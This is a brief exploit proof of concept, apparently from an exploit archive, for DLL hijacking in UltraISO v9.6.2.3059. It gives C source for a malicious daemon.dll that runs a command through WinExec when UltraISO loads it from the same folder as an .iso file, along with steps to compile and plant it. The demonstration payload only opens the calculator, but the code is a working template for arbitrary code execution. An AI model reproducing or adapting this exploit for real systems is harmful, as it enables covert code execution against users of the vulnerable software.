#[+] Author: TUNISIAN CYBER #[+] Exploit Title: UltraISO v9.6.2.3059 DLL Hijacking #[+] Date: 28-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Poc:http://i.imgur.com/naHAdJF.png #[+] Create Compile the file then rename it to daemon.dll then create .iso file , make sure that # the 2 files are in the same dir. #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; } Source